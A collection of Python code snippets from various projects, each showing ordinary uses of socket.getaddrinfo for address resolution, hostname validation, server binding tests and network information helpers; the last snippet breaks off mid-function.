Example #1
	def getaddrinfo(cls, host, port, family = None):
		socktype = socket.SOCK_STREAM
		if osIsPosix and\
		   family is None and\
		   host in {"localhost", "127.0.0.1", "::1"} and\
		   False: #XXX disabled, for now
			# We are on posix OS. Instead of AF_INET on localhost,
			# we use Unix domain sockets.
			family = AF_UNIX
			sockaddr = "/tmp/awlsim-server-%d.socket" % port
		else:
			if family in {None, socket.AF_UNSPEC}:
				# First try IPv4
				try:
					family, socktype, proto, canonname, sockaddr =\
						socket.getaddrinfo(host, port,
								   socket.AF_INET,
								   socktype)[0]
				except socket.gaierror as e:
					if e.errno == socket.EAI_ADDRFAMILY:
						# Also try IPv6
						family, socktype, proto, canonname, sockaddr =\
							socket.getaddrinfo(host, port,
									   socket.AF_INET6,
									   socktype)[0]
					else:
						raise e
			else:
				family, socktype, proto, canonname, sockaddr =\
					socket.getaddrinfo(host, port,
							   family,
							   socktype)[0]
		return (family, socktype, sockaddr)
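A minimal usage sketch (not part of the original project): the (family, socktype, sockaddr) triple produced by a resolver like the one above maps directly onto socket creation and connect. The helper name connect_resolved is hypothetical.

import socket

def connect_resolved(host, port):
    # Resolve with the standard library, then connect using the first result,
    # mirroring how the wrapper above consumes getaddrinfo()'s output.
    family, socktype, proto, canonname, sockaddr = socket.getaddrinfo(
        host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)[0]
    sock = socket.socket(family, socktype, proto)
    sock.connect(sockaddr)
    return sock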
Example #2
def _check_resolved_address(sock, address):
    # Ensure that the address is already resolved to avoid the trap of hanging
    # the entire event loop when the address requires doing a DNS lookup.
    family = sock.family
    if family == socket.AF_INET:
        host, port = address
    elif family == socket.AF_INET6:
        host, port = address[:2]
    else:
        return

    type_mask = 0
    if hasattr(socket, 'SOCK_NONBLOCK'):
        type_mask |= socket.SOCK_NONBLOCK
    if hasattr(socket, 'SOCK_CLOEXEC'):
        type_mask |= socket.SOCK_CLOEXEC
    # Use getaddrinfo(flags=AI_NUMERICHOST) to ensure that the address is
    # already resolved.
    try:
        socket.getaddrinfo(host, port,
                           family=family,
                           type=(sock.type & ~type_mask),
                           proto=sock.proto,
                           flags=socket.AI_NUMERICHOST)
    except socket.gaierror as err:
        raise ValueError("address must be resolved (IP address), got %r: %s"
                         % (address, err))
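A short usage sketch (assumptions: a plain IPv4 TCP socket, no running event loop): the check is silent for a numeric address and raises ValueError when the address would still need a DNS lookup.

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_check_resolved_address(sock, ("127.0.0.1", 8080))       # passes: already numeric
try:
    _check_resolved_address(sock, ("example.com", 80))    # would need DNS
except ValueError as err:
    print(err)
sock.close()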
Example #3
def ip_extract():
    """ Return list of IP addresses of this system """
    ips = []
    program = find_on_path('ip')
    if program:
        program = [program, 'a']
    else:
        program = find_on_path('ifconfig')
        if program:
            program = [program]

    if sabnzbd.WIN32 or not program:
        try:
            info = socket.getaddrinfo(socket.gethostname(), None)
        except:
            # Hostname does not resolve, use localhost
            info = socket.getaddrinfo('localhost', None)
        for item in info:
            ips.append(item[4][0])
    else:
        p = subprocess.Popen(program, shell=False, stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                             startupinfo=None, creationflags=0)
        output = p.stdout.read()
        p.wait()
        for line in output.split('\n'):
            m = _RE_IP4.search(line)
            if not (m and m.group(2)):
                m = _RE_IP6.search(line)
            if m and m.group(2):
                ips.append(m.group(2))
    return ips
Example #4
def is_hostname_sane(hostname):
    """Make sure the given host name is sane.

    Do enough to avoid shellcode from the environment.  There's
    no need to do more.

    :param str hostname: Host name to validate

    :returns: True if hostname is valid, otherwise false.
    :rtype: bool

    """
    # hostnames & IPv4
    allowed = string.ascii_letters + string.digits + "-."
    if all([c in allowed for c in hostname]):
        return True

    if not ALLOW_RAW_IPV6_SERVER:
        return False

    # ipv6 is messy and complicated, can contain %zoneindex etc.
    try:
        # is this a valid IPv6 address?
        socket.getaddrinfo(hostname, 443, socket.AF_INET6)
        return True
    except:
        return False
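A quick usage sketch, assuming ALLOW_RAW_IPV6_SERVER is a module-level boolean (as the code above implies) and that string and socket are imported.

import socket
import string

ALLOW_RAW_IPV6_SERVER = True

print(is_hostname_sane("my.example.com"))      # True: letters, digits, '-', '.'
print(is_hostname_sane("example.com;rm -rf"))  # False: shell metacharacters
print(is_hostname_sane("::1"))                 # True only if it parses as an IPv6 address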
Example #5
    def _getSession(self, content):
        traphost = content['action_destination']
        port = content.get('port', 162)
        destination = '%s:%s' % (traphost, port)

        if not traphost or port <= 0:
            log.error("%s: SNMP trap host information %s is incorrect ", destination)
            return None

        community = content.get('community', 'public')
        version = content.get('version', 'v2c')

        session = self._sessions.get(destination, None)
        if session is None:
            log.debug("Creating SNMP trap session to %s", destination)

            # Test that the hostname and port are sane.
            try:
                getaddrinfo(traphost, port)
            except Exception:
                raise ActionExecutionException("The destination %s is not resolvable." % destination)

            session = netsnmp.Session((
                '-%s' % version,
                '-c', community,
                destination)
            )
            session.open()
            self._sessions[destination] = session

        return session
Example #6
def validate_hostname(hostname):
    try:
        if ":" in hostname:
            hostname, port = hostname.split(":")
        socket.getaddrinfo(hostname, None)
    except socket.error, e:
        raise OperationError("Could not resolve host '%s', error: %s" % (hostname, e))
Example #7
def _resolve_addrs(straddrs, port, ignore_unavailable=False, protocols=[socket.AF_INET, socket.AF_INET6]):
    """ Returns a tupel of tupels of (family, to, original_addr_family, original_addr).

    If ignore_unavailable is set, addresses for unavailable protocols are ignored.
    protocols determines the protocol family indices supported by the socket in use. """

    res = []
    for sa in straddrs:
        try:
            ais = socket.getaddrinfo(sa, port)
            for ai in ais:
                if ai[0] in protocols:
                    res.append((ai[0], ai[4], ai[0], ai[4][0]))
                    break
            else:
                # Try to convert from IPv4 to IPv6
                ai = ais[0]
                if ai[0] == socket.AF_INET and socket.AF_INET6 in protocols:
                    to = socket.getaddrinfo('::ffff:' + ai[4][0], port, socket.AF_INET6)[0][4]
                    res.append((socket.AF_INET6, to, ai[0], ai[4][0]))
        except socket.gaierror:
            if not ignore_unavailable:
                raise

    return res
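A brief usage sketch (addresses are placeholders): resolve a couple of string addresses for port 8080 and look at the resulting (family, to, original_addr_family, original_addr) tuples; restricting protocols to IPv6 shows the v4-mapped fallback.

import socket

for entry in _resolve_addrs(["127.0.0.1", "::1"], 8080):
    family, to, orig_family, orig_addr = entry
    print(family, to, orig_family, orig_addr)

# IPv6-only socket: the IPv4 literal comes back as ::ffff:127.0.0.1
print(_resolve_addrs(["127.0.0.1"], 8080, protocols=[socket.AF_INET6]))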
Example #8
 def _matchIPAddress(self, host, certHost):
     # type: (AnyStr, AnyStr) -> bool
     """
     >>> check = Checker()
     >>> check._matchIPAddress(host='my.example.com',
     ...     certHost='my.example.com')
     False
     >>> check._matchIPAddress(host='1.2.3.4', certHost='1.2.3.4')
     True
     >>> check._matchIPAddress(host='1.2.3.4', certHost='*.2.3.4')
     False
     >>> check._matchIPAddress(host='1.2.3.4', certHost='1.2.3.40')
     False
     >>> check._matchIPAddress(host='::1', certHost='::1')
     True
     >>> check._matchIPAddress(host='::1', certHost='0:0:0:0:0:0:0:1')
     True
     >>> check._matchIPAddress(host='::1', certHost='::2')
     False
     """
     try:
         canonical = socket.getaddrinfo(host, 0, 0, socket.SOCK_STREAM, 0,
                                        socket.AI_NUMERICHOST)
         certCanonical = socket.getaddrinfo(certHost, 0, 0,
                                            socket.SOCK_STREAM, 0,
                                            socket.AI_NUMERICHOST)
     except:
         return False
     return canonical == certCanonical
Example #9
    def _create_remote_socket(self, ip, port):
        if self._remote_udp:
            addrs_v6 = socket.getaddrinfo("::", 0, 0, socket.SOCK_DGRAM, socket.SOL_UDP)
            addrs = socket.getaddrinfo("0.0.0.0", 0, 0, socket.SOCK_DGRAM, socket.SOL_UDP)
        else:
            addrs = socket.getaddrinfo(ip, port, 0, socket.SOCK_STREAM, socket.SOL_TCP)
        if len(addrs) == 0:
            raise Exception("getaddrinfo failed for %s:%d" % (ip, port))
        af, socktype, proto, canonname, sa = addrs[0]
        if self._forbidden_iplist:
            if common.to_str(sa[0]) in self._forbidden_iplist:
                raise Exception('IP %s is in forbidden list, reject' %
                                common.to_str(sa[0]))
        remote_sock = socket.socket(af, socktype, proto)
        self._remote_sock = remote_sock
        self._fd_to_handlers[remote_sock.fileno()] = self

        if self._remote_udp:
            af, socktype, proto, canonname, sa = addrs_v6[0]
            remote_sock_v6 = socket.socket(af, socktype, proto)
            self._remote_sock_v6 = remote_sock_v6
            self._fd_to_handlers[remote_sock_v6.fileno()] = self
            remote_sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024 * 32)
            remote_sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024 * 32)
            remote_sock_v6.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024 * 32)
            remote_sock_v6.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024 * 32)

        remote_sock.setblocking(False)
        if self._remote_udp:
            pass
        else:
            remote_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
        return remote_sock
Example #10
  def test_start_some_fail_to_bind(self):
    failing_server = self.mox.CreateMock(
        wsgi_server._SingleAddressWsgiServer)
    starting_server = self.mox.CreateMock(
        wsgi_server._SingleAddressWsgiServer)
    another_starting_server = self.mox.CreateMock(
        wsgi_server._SingleAddressWsgiServer)
    self.mox.StubOutWithMock(wsgi_server, '_SingleAddressWsgiServer')
    self.mox.StubOutWithMock(socket, 'getaddrinfo')
    socket.getaddrinfo('localhost', 123, socket.AF_UNSPEC, socket.SOCK_STREAM,
                       0, socket.AI_PASSIVE).AndReturn(
                           [(None, None, None, None, ('foo', 'bar', 'baz')),
                            (None, None, None, None, (1, 2, 3, 4, 5)),
                            (None, None, None, None, (3, 4))])
    wsgi_server._SingleAddressWsgiServer(('foo', 'bar'), None).AndReturn(
        failing_server)
    wsgi_server._SingleAddressWsgiServer((1, 2), None).AndReturn(
        starting_server)
    wsgi_server._SingleAddressWsgiServer((3, 4), None).AndReturn(
        another_starting_server)
    starting_server.start()
    failing_server.start().AndRaise(wsgi_server.BindError)
    another_starting_server.start()

    self.mox.ReplayAll()
    self.server.start()
    self.mox.VerifyAll()
    self.assertItemsEqual([starting_server, another_starting_server],
                          self.server._servers)
Example #11
 def test_retry_limited(self):
   inet4_servers = [self.mox.CreateMock(wsgi_server._SingleAddressWsgiServer)
                    for _ in range(wsgi_server._PORT_0_RETRIES)]
   inet6_servers = [self.mox.CreateMock(wsgi_server._SingleAddressWsgiServer)
                    for _ in range(wsgi_server._PORT_0_RETRIES)]
   self.mox.StubOutWithMock(wsgi_server, '_SingleAddressWsgiServer')
   self.mox.StubOutWithMock(socket, 'getaddrinfo')
   socket.getaddrinfo('localhost', 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
                      socket.AI_PASSIVE).AndReturn(
                          [(None, None, None, None, ('127.0.0.1', 0, 'baz')),
                           (None, None, None, None, ('::1', 0, 'baz'))])
   for offset, (inet4_server, inet6_server) in enumerate(zip(
       inet4_servers, inet6_servers)):
     wsgi_server._SingleAddressWsgiServer(('127.0.0.1', 0), None).AndReturn(
         inet4_server)
     inet4_server.start()
     inet4_server.port = offset + 1
     wsgi_server._SingleAddressWsgiServer(('::1', offset + 1), None).AndReturn(
         inet6_server)
     inet6_server.start().AndRaise(
         wsgi_server.BindError('message', (errno.EADDRINUSE, 'in use')))
     inet4_server.quit()
   self.mox.ReplayAll()
   self.assertRaises(wsgi_server.BindError, self.server.start)
   self.mox.VerifyAll()
Example #12
def netGetAddrInfo(host, port, family = None):
	"""getaddrinfo() wrapper.
	"""
	socktype = socket.SOCK_STREAM
	if family in {None, socket.AF_UNSPEC}:
		# First try IPv4
		try:
			family, socktype, proto, canonname, sockaddr =\
				socket.getaddrinfo(host, port,
						   socket.AF_INET,
						   socktype)[0]
		except socket.gaierror as e:
			if e.errno == socket.EAI_ADDRFAMILY:
				# Also try IPv6
				family, socktype, proto, canonname, sockaddr =\
					socket.getaddrinfo(host, port,
							   socket.AF_INET6,
							   socktype)[0]
			else:
				raise e
	else:
		family, socktype, proto, canonname, sockaddr =\
			socket.getaddrinfo(host, port,
					   family,
					   socktype)[0]
	return (family, socktype, sockaddr)
Example #13
    def address_info(self):
        if not self._address_info or (datetime.now() - self._address_info_resolved_time).seconds > ADDRESS_INFO_REFRESH_TIME:
            # converts addresses tuple to list and adds a 6th parameter for availability (None = not checked, True = available, False=not available) and a 7th parameter for the checking time
            addresses = None
            try:
                if self.ipc:
                    addresses = [(socket.AF_UNIX, socket.SOCK_STREAM, 0, None, self.host, None)]
                else:
                    addresses = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM, socket.IPPROTO_TCP, socket.AI_ADDRCONFIG | socket.AI_V4MAPPED)
            except (socket.gaierror, AttributeError):
                pass

            if not addresses:  # if addresses not found or raised an exception (for example for bad flags) tries again without flags
                try:
                    addresses = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM, socket.IPPROTO_TCP)
                except socket.gaierror:
                    pass

            if addresses:
                self._address_info = [list(address) + [None, None] for address in addresses]
                self._address_info_resolved_time = datetime.now()
            else:
                self._address_info = []
                self._address_info_resolved_time = datetime(MINYEAR, 1, 1)  # smallest date

            if log_enabled(BASIC):
                for address in self._address_info:
                    log(BASIC, 'address for <%s> resolved as <%r>', self, address[:-2])
        return self._address_info
Example #14
def is_socket_address(value):
    """Validate that value is a valid address."""
    try:
        socket.getaddrinfo(value, None)
        return value
    except OSError:
        raise vol.Invalid('Device is not a valid domain name or ip address')
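A brief usage sketch, assuming voluptuous is installed (the vol.Invalid call above points at that library); the unresolvable name uses the reserved .invalid TLD.

import socket
import voluptuous as vol

print(is_socket_address("localhost"))     # returns the value unchanged
print(is_socket_address("192.0.2.10"))    # numeric addresses validate too
try:
    is_socket_address("no-such-host.invalid")
except vol.Invalid as err:
    print(err)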
Example #15
def resolve(hostname, family=None):
    '''
    Resolves the hostname to one or more IP addresses through the operating
    system. Resolution is carried out for the given address family. If no
    address family is specified, only IPv4 and IPv6 addresses are returned. If
    multiple IP addresses are found, all are returned.

    :return: tuple of unique IP addresses
    '''
    af_ok = (AF_INET, AF_INET6)
    if family is not None and family not in af_ok:
        raise ValueError("Invalid AF_ '%s'" % family)
    ips = ()
    try:
        if family is None:
            addrinfo = socket.getaddrinfo(hostname, None)
        else:
            addrinfo = socket.getaddrinfo(hostname, None, family)
    except socket.gaierror as exc:
        log.debug("socket.getaddrinfo() raised an exception", exc_info=exc)
    else:
        if family is None:
            ips = tuple(set(
                        [item[4][0] for item in addrinfo if item[0] in af_ok]
                        ))
        else:
            ips = tuple(set([item[4][0] for item in addrinfo]))
    return ips
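A quick usage sketch, assuming the same module-level imports the function relies on (AF_INET/AF_INET6 from socket and a log object).

from socket import AF_INET, AF_INET6

print(resolve("localhost"))            # e.g. ('127.0.0.1', '::1'); order is unspecified
print(resolve("localhost", AF_INET))   # IPv4 only, e.g. ('127.0.0.1',)
print(resolve("host.invalid"))         # () -- the gaierror is logged and swallowed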
Example #16
def main(file_path):
    try:
        addfile = open(file_path, "r")
        urlfile = open(file_path,'r')
        writefile = open("valid_url_dest_ips.csv", "w")
        urls = addfile.readlines()

        # Read the URLs line by line and check whether each one resolves. URLs are expected to include a scheme (http:// or https://), which selects port 80 or 443.
        for allurls in xrange(0, len(urls) - 1):
            url = urls[allurls].split('/')[2].strip()

            if str(urls[allurls].split(':')[0].strip()) == 'http':
                proto = 80
            else:
                proto = 443
            try:
                destip = socket.getaddrinfo(url, proto, 0, 0, socket.IPPROTO_TCP)
            except Exception, msg:
                try:
                    destip = socket.getaddrinfo(url, proto, 0, 0, socket.IPPROTO_TCP)
                    print "************ " + destip
                except Exception, msg:
                    #print msg
                    writefile.write("%s, \n" % urls[allurls].strip())
                    continue

            # Based on the output of getaddrinfo, extract the IP out of complete return string tuple.
            for tuple in destip:
                for inner_tuple in tuple:
                    if isinstance(inner_tuple, __builtins__.tuple):
                        if len(inner_tuple) == 2:
                            first_val, second_val = inner_tuple
                            writefile.write("%s,%s\n" % (urls[allurls].strip(), first_val))
Example #17
    def updatePublicAddress(self):
        if self.config["address"] is not None:
            self.public_host = self.config["address"]
            self.public_ip = [addr[4][0] for addr in socket.getaddrinfo(self.public_host, None) if self._addrIsUsable(addr)][0]
        else:
            try:
                conn = urllib2.urlopen("http://ifconfig.me/all.json", timeout=3)
                data = json.loads(conn.read())
                self.raw_ip, self.raw_host = data["ip_addr"], data["remote_host"]
            except:
                log.err("Couldn't fetch remote IP and hostname")
                self.raw_host = socket.getfqdn()
                ips = [addr[4][0] for addr in socket.getaddrinfo(self.raw_host, None) if self._addrIsUsable(addr)]
                self.raw_ip = ips[0] if ips else "127.0.0.1"

            self.public_host = self.raw_host
            self.public_ip = self.raw_ip

        tcp = map(lambda p: int(p.split(":")[1]), filter(lambda p: p.startswith("tcp"), self.config["endpoints"]))
        if self.config["port"]:
            self.public_port = self.config["port"]
        elif tcp and 80 not in tcp:
            self.public_port = tcp[0]
        else:
            self.public_port = 80

        self.public_address = "http://{}:{:d}/".format(self.public_host, self.public_port) if self.public_port != 80 else "http://{}/".format(self.public_host)
Example #18
def get_socket_address(host, port, ipv4_only=False):
    """
    Gather information needed to open the server socket.
    Try to resolve the name, giving precedence to IPv4 for backward compatibility
    but still mapping the host to an IPv6 address; fall back to IPv6 otherwise.
    """
    try:
        info = socket.getaddrinfo(host, port, socket.AF_INET, socket.SOCK_DGRAM)
    except socket.gaierror as e:
        try:
            if not ipv4_only:
                info = socket.getaddrinfo(host, port, socket.AF_INET6, socket.SOCK_DGRAM)
            elif host == 'localhost':
                log.warning("Warning localhost seems undefined in your host file, using 127.0.0.1 instead")
                info = socket.getaddrinfo('127.0.0.1', port, socket.AF_INET, socket.SOCK_DGRAM)
            else:
                log.error('Error processing host %s and port %s: %s', host, port, e)
                return None
        except socket.gaierror as e:
            log.error('Error processing host %s and port %s: %s', host, port, e)
            return None

    # we get the first item of the list and map the address for IPv4 hosts
    sockaddr = info[0][-1]
    if info[0][0] == socket.AF_INET and not ipv4_only:
        mapped_host = mapto_v6(sockaddr[0])
        sockaddr = (mapped_host, sockaddr[1], 0, 0)
    return sockaddr
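A hedged sketch of how the returned sockaddr could feed a UDP server socket. It assumes a dual-stack host: unless ipv4_only is set, an IPv4 result is returned as a v4-mapped IPv6 4-tuple and therefore needs an AF_INET6 socket.

import socket

sockaddr = get_socket_address("localhost", 8125)
if sockaddr is not None:
    # A 2-tuple means plain IPv4 (ipv4_only path); a 4-tuple means IPv6/mapped.
    family = socket.AF_INET if len(sockaddr) == 2 else socket.AF_INET6
    server = socket.socket(family, socket.SOCK_DGRAM)
    server.bind(sockaddr)
    print("listening on", server.getsockname())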
Example #19
  def _ResolveHostname(self, hostname):
    """Resolve |hostname| into a network hostname.

    If |hostname| is an alias, |self._alias| is updated to be |hostname|.
    If the connection type can be determined during hostname resolution,
    |self.connection_type| is updated to the proper value.

    Args:
      hostname: Can either be a network hostname or user-friendly USB device
        name (aka alias).

    Returns:
      Network hostname as as string.
    """
    # If |hostname| is resolvable via DNS, then it's a valid hostname.
    # If |hostname| is resolvable via Debug Link mDNS, then it's an alias.
    try:
      socket.getaddrinfo(hostname, 0)
      return hostname
    except socket.gaierror:
      ip = GetUSBDeviceIP(hostname)
      if ip:
        self._alias = hostname
        self.connection_type = CONNECTION_TYPE_USB
        return ip
      # |hostname| is not resolvable but may still be valid (eg. ssh hostname).
      # Leave the hostname be.
      return hostname
Example #20
 def deeper_search(self):
     
     self.logger.debug('called deeper_search()')
     
     import socket
     d_list = []
     
     try:
         search_list = open(self.wordlist, 'r')
     except WhoException:
         search_list = self.wordlist
     
     for line in search_list:
         d_line = line.rstrip() + "." + self.tld
         try: socket.getaddrinfo(d_line, None, socket.AF_INET, socket.SOCK_STREAM)
         except socket.gaierror:
             d_list.append(line)
     
     if type(search_list) is ListType:
         pass
     else:
         search_list.close()
     
     self.wordlist = d_list
     x = self.whois_multi_search
     return x     
Example #21
def GetServerParms(host, port):
    """ Return processed getaddrinfo() for server
    """
    try:
        int(port)
    except:
        port = 119
    opt = sabnzbd.cfg.ipv6_servers()
    try:
        # Standard IPV4 or IPV6
        ips = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)
        if opt == 2 or (_EXTERNAL_IPV6 and opt == 1):
            # IPv6 reachable and allowed, or forced by user
            return ips
        else:
            # IPv6 unreachable or not allowed by user
            return [ip for ip in ips if ':' not in ip[4][0]]
    except:
        if opt == 2 or (_EXTERNAL_IPV6 and opt == 1):
            try:
                # Try IPV6 explicitly
                return socket.getaddrinfo(host, port, socket.AF_INET6,
                                          socket.SOCK_STREAM, socket.IPPROTO_IP, socket.AI_CANONNAME)
            except:
                # Nothing found!
                pass
        return None
Example #22
def GetServerParms(host, port):
    """ Return processed getaddrinfo() for server """
    try:
        int(port)
    except:
        port = 119
    opt = sabnzbd.cfg.ipv6_servers()
    ''' ... with the following meaning for 'opt':
    Control the use of IPv6 Usenet server addresses. Meaning:
    0 = don't use
    1 = use when available and reachable (DEFAULT)
    2 = force usage (when SABnzbd's detection fails)
    '''
    try:
        # Standard IPV4 or IPV6
        ips = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)
        if opt == 2 or (opt == 1 and sabnzbd.EXTERNAL_IPV6) or (opt == 1 and sabnzbd.cfg.load_balancing() == 2):
            # IPv6 forced by user, or IPv6 allowed and reachable, or IPv6 allowed and loadbalancing-with-IPv6 activated
            # So return all IP addresses, no matter IPv4 or IPv6:
            return ips
        else:
            # IPv6 unreachable or not allowed by user, so only return IPv4 address(es):
            return [ip for ip in ips if ':' not in ip[4][0]]
    except:
        if opt == 2 or (opt == 1 and sabnzbd.EXTERNAL_IPV6) or (opt == 1 and sabnzbd.cfg.load_balancing() == 2):
            try:
                # Try IPV6 explicitly
                return socket.getaddrinfo(host, port, socket.AF_INET6,
                                          socket.SOCK_STREAM, socket.IPPROTO_IP, socket.AI_CANONNAME)
            except:
                # Nothing found!
                pass
        return False
Example #23
def get_hostname(local = ''):
    if platform.system() in ['Windows', 'Microsoft']:
        if local == 'true':
            return '0.0.0.0'
        else:
            #have to change to IP address of machine to load data into if running over the network
            return '0.0.0.0'
    else:
        if local == 'true':
            #have to change to IP address of local machine if running over the network
            hostname = socket.gethostname()
            address_list = socket.getaddrinfo(hostname,None)
            if len(address_list) > 0:
                ipv6_tuple_index = len(address_list) - 1
                return address_list[ipv6_tuple_index][4][0]
            else:
                return hostname
        else:
            #have to change to IP address of machine to load data into if running over the network
            hostname = socket.gethostname()
            # getaddrinfo(host,port) returns a list of tuples
            # in the form of (family, socktype, proto, canonname, sockaddr)
            # and we extract the IP address from 'sockaddr'
            address_list = socket.getaddrinfo(hostname,None)
            if len(address_list) > 0:
                ipv6_tuple_index = len(address_list) - 1
                return address_list[ipv6_tuple_index][4][0]
            else:
                return hostname
Example #24
def connect(host, port, ipv6=0, bind="0.0.0.0", bindport=0):
    if ipv6:
        af_inet = socket.AF_INET6
    else:
        af_inet = socket.AF_INET
    if not bindport:
        bindport = random.choice(range(40000, 50000))
    s = None
    for res in socket.getaddrinfo(bind, bindport, af_inet, socket.SOCK_STREAM):
        vhost = res[4]
        for res in socket.getaddrinfo(host, port, af_inet, socket.SOCK_STREAM):
            af, socktype, proto, canonname, sa = res
            try:
                s = socket.socket(af, socktype, proto)
            except socket.error, e:
                s = None;error=e
                continue
            try:
                s.bind(vhost)
                s.connect(sa)
            except socket.error, e:
                s.close()
                s = None;error=e
                continue
            break
Example #25
 def start(self):
     INFO("{} starting with pid: {}".format(self.name, self.pid))
     kill_processes(self.name, manager_logger)
     ck = ChildKiller(self.name, manager_logger, redis=True)
     ck.daemon = True
     ck.start()
     loc_addr = {addr[4][0] for addr in
                 socket.getaddrinfo('localhost', 80) +
                 socket.getaddrinfo(socket.getfqdn(), 80)}
     for single_repl in self.shard_list:
         for db_attr in single_repl:
             cfg_addr = {addr[4][0] for addr in
                 socket.getaddrinfo(db_attr['host'], 80)}
             if loc_addr & cfg_addr:
                 srv = RedisManager(db_attr, self.done_q)
                 srv.daemon = True
                 srv.start()
                 self.srvs.append(srv)
                 INFO('Redis Manager {} spawned'.format(db_attr))
     for _ in self.srvs:
         try:
             db_attr = self.done_q.get(timeout=INIT_WAIT_LIMIT)
             db_attr.pop('db')
             INFO('Redis Manager {} started'.format(db_attr))
         except Empty:
             ERROR("{}:: Unable to start all Redis Managers."
                 .format(self.name))
             sys.exit(1)
     for srv in self.srvs:
         srv.join()
     ck.join()
Example #26
 def _is_local(self, host):
     loc_addr = {addr[4][0] for addr in
                 socket.getaddrinfo('localhost', 80) +
                 socket.getaddrinfo(socket.getfqdn(), 80)}
     cfg_addr = {addr[4][0] for addr in
                 socket.getaddrinfo(host, 80)}
     return loc_addr & cfg_addr
Example #27
def port_to_tcp(port=None):
    """Returns local tcp address for a given `port`, automatic port if `None`"""
    #address = 'tcp://' + socket.gethostbyname(socket.getfqdn())
    domain_name = socket.getfqdn()
    try:
        addr_list = socket.getaddrinfo(domain_name, None)
    except Exception:
        addr_list = socket.getaddrinfo('127.0.0.1', None)
    family, socktype, proto, canonname, sockaddr = addr_list[0]
    host = convert_ipv6(sockaddr[0])
    address =  'tcp://' + host
    if port is None:
        port = ()
    if not isinstance(port, int):
        # determine port automatically
        context = zmq.Context()
        try:
            socket_ = context.socket(zmq.REP)
            socket_.ipv6 = is_ipv6(address)
            port = socket_.bind_to_random_port(address, *port)
        except Exception:
            print('Could not connect to {} using {}'.format(address, addr_list))
            pypet_root_logger = logging.getLogger('pypet')
            pypet_root_logger.exception('Could not connect to {}'.format(address))
            raise
        socket_.close()
        context.term()
    return address + ':' + str(port)
Example #28
    def network_details():
        """
        Returns details about the network links
        """
        # Get IPv4 details
        ipv4_addresses = [info[4][0] for info in socket.getaddrinfo(
            socket.gethostname(), None, socket.AF_INET)]

        # Add localhost
        ipv4_addresses.extend(info[4][0] for info in socket.getaddrinfo(
            "localhost", None, socket.AF_INET))

        # Filter addresses
        ipv4_addresses = sorted(set(ipv4_addresses))

        try:
            # Get IPv6 details
            ipv6_addresses = [info[4][0] for info in socket.getaddrinfo(
                socket.gethostname(), None, socket.AF_INET6)]

            # Add localhost
            ipv6_addresses.extend(info[4][0] for info in socket.getaddrinfo(
                "localhost", None, socket.AF_INET6))

            # Filter addresses
            ipv6_addresses = sorted(set(ipv6_addresses))
        except (socket.gaierror, AttributeError):
            # AttributeError: AF_INET6 is missing in some versions of Python
            ipv6_addresses = None

        return {"IPv4": ipv4_addresses, "IPv6": ipv6_addresses,
                "host.name": socket.gethostname(),
                "host.fqdn": socket.getfqdn()}
Example #29
def read_network():
    netdict = {}
    netdict['class'] = "NETINFO"

    netdict['hostname'], netdict['ipaddr'], netdict['ip6addr'] = findHostByRoute()

    if netdict['hostname'] == "unknown":
        netdict['hostname'] = gethostname()
        if "." not in netdict['hostname']:
            netdict['hostname'] = socket.getfqdn()

    if netdict['ipaddr'] is None:
        try:
            list_of_addrs = getaddrinfo(netdict['hostname'], None)
            ipv4_addrs = filter(lambda x:x[0]==socket.AF_INET, list_of_addrs)
            # take first ipv4 addr
            netdict['ipaddr'] = ipv4_addrs[0][4][0]
        except:
            netdict['ipaddr'] = "127.0.0.1"

    if netdict['ip6addr'] is None:
        try:
            list_of_addrs = getaddrinfo(netdict['hostname'], None)
            ipv6_addrs = filter(lambda x:x[0]==socket.AF_INET6, list_of_addrs)
            # take first ipv6 addr
            netdict['ip6addr'] = ipv6_addrs[0][4][0]
        except:
            netdict['ip6addr'] = "::1"

    if netdict['ipaddr'] is None:
        netdict['ipaddr'] = ''
    if netdict['ip6addr'] is None:
        netdict['ip6addr'] = ''
    return netdict
Example #30
def resolveHostnamePort(hostnamePort=''):
    """ hostname:port sanity check """

    hostname = urlparse.urlparse(hostnamePort)[1].split(':')
    port = ''
    if len(hostname) > 1:
        hostname, port = hostname[:2]
    else:
        hostname = hostname[0]

    if port:
        try:
            x = int(port)
            if str(x) != port:
                raise ValueError('should be an integer: %s' % port)
        except ValueError:
            sys.stderr.write("ERROR: the port setting is not an integer: %s\n" % port)
            sys.exit(1)

    if hostname:
        try:
            socket.getaddrinfo(hostname, None)
        except:  # pylint: disable=W0702
            errorCode, errorString = _errorHandler()
            sys.stderr.write(errorString + '\n')
            sys.exit(errorCode)
Example #31
    def slurp(self, proto, url):
        # We generate these tokens:
        #  url:non_resolving
        #  url:non_html
        #  url:http_XXX (for each type of http error encountered,
        #                for example 404, 403, ...)
        # And tokenise the received page (but we do not slurp this).
        # Actually, the special url: tokens barely showed up in my testing,
        # although I would have thought that they would appear more often -
        # this might be due to an error, although they do turn up on occasion.  In
        # any case, we have to do the test, so generating an extra token
        # doesn't cost us anything apart from another entry in the db, and
        # it's only two entries, plus one for each type of http error
        # encountered, so it's pretty negligible.
        # If there is no content in the URL, then just return immediately.
        # "http://)" will trigger this.
        if not url:
            return ["url:non_resolving"]

        from spambayes.tokenizer import Tokenizer

        if options["URLRetriever", "x-only_slurp_base"]:
            url = self._base_url(url)

        # Check the unretrievable caches
        for err in self.bad_urls.keys():
            if url in self.bad_urls[err]:
                return [err]
        if self.http_error_urls.has_key(url):
            return self.http_error_urls[url]

        # We check if the url will resolve first
        mo = DOMAIN_AND_PORT_RE.match(url)
        domain = mo.group(1)
        if mo.group(3) is None:
            port = 80
        else:
            port = mo.group(3)
        try:
            _unused = socket.getaddrinfo(domain, port)
        except socket.error:
            self.bad_urls["url:non_resolving"] += (url, )
            return ["url:non_resolving"]

        # If the message is in our cache, then we can just skip over
